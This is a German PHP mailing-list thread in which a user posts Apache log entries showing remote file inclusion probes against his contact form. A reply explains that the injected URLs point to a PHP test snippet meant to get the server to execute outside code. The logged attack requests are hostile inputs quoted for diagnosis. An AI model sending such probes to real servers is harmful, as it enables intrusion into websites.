Mailinglisten-Archive |
Silvio Siefke wrote:
> Mahlzeit,
>
>
>
> ich habe vermehr Logeinträge wie folgt zu lesen:
>
> <code>
> 209.59.163.226 - - [04/Feb/2008:07:14:43 +0100] "GET
> /kontakt.php?http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2Fpic%2Fbezefi%2Fugoye%2F
> HTTP/1.0" 200 7218
> 209.59.163.226 - - [04/Feb/2008:07:14:44 +0100] "GET
> /kontakt.php?http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F
> HTTP/1.0" 200 7218
> 209.59.163.226 - - [04/Feb/2008:07:14:44 +0100] "GET
> /kontakt.php?http%3A%2F%2Fwww.alonsaunet.com%2Fwebmaster%2Fromi%2Fjirudog%2F
> HTTP/1.0" 200 7218
> </code>
>
> Hat das irgendetwas besonderes zu sagen.
Ja: Irgendwer versucht irgend einen Mist mit deinem Formular anzustellen.
>
>
> Meine PHP Installation habe ich wie nachfolgend "gesichert".
> "http://www.strassenprogrammierer.de/php-absichern-hacker_tipp_497.html"
Das ist wohl eher die Anleitung für den Systemadministrator zu
Schadensminimierung, falls der php-Programmierer unsicheren Code
schreibt. Durchaus wichtig, aber wie deine kontakt.php aussieht ist viel
wichtiger.
Die übergebenen URLs enthalten den Text
<?php echo md5("just_a_test");?>
Es wird wohl darum gehen deinen Server dazu zu bringen diesen Code
auszuführen.
Mir ist aktuell nicht ganz klar, wie dermaßen schlecht dein Code sein
muss, damit dieser Angriff funktioniert... Es sei denn der Code baut auf
einer (ehemaligen) Sicherheitslücke in php auf...
>
> OpenBasedir ist nicht möglich, weil Maia und Squirrelmail ein wenig am
> schimpfen sind.
>
> Würde mich über Rat freuen.
>
> Debian Etch
> PHP/4.4.4-8+etch4
> Apache 1.3.34
>
>
> MFG
> Silvio
Yannik
php::bar PHP Wiki - Listenarchive